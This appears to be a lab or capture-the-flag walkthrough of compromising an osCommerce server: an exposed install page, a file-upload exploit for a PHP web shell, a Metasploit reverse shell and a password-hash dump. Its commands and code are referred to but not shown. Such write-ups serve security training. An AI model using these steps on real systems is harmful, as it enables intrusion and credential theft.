Let’s kick it off with a port scan.

Checking the ports, there is an OS Commerce on port 8080. Accessing the catalog directory there is a messed up website. Time to do directory bruteforcing. I use gobuster for that task, and an “install” page pops up.

Checking that page I’m being able to install the OS Commerce. I used the following creds for the database:

Now i have to wait for the database to be imported. After DB import is done, I set the admin credentials. I chose admin:admin as user and pass.

We have access to the admin panel, now it’s the time to search for an exploit. Using searchsploit I find an Arbitrary File Upload vuln.

Let’s see what we need in order to upload a shell.

Upon testing, I made this simple PHP file in order to be uploaded. With this, I can issue commands to the OS.

Time to upload the shell!

Let’s access it, put the “cmd” parameter, and issue a command.

Method 1

Seems we’re NT Authority (highest privileged account). To get a reverse shell I leveraged msfconsole web delivery module.

I copied the last line and pasted it in my web shell to get it executed. You’ll have to wait a little to get it executed, but there’s gonna be a success.

Now, by simply running hashdump you’ll dump the users hashes.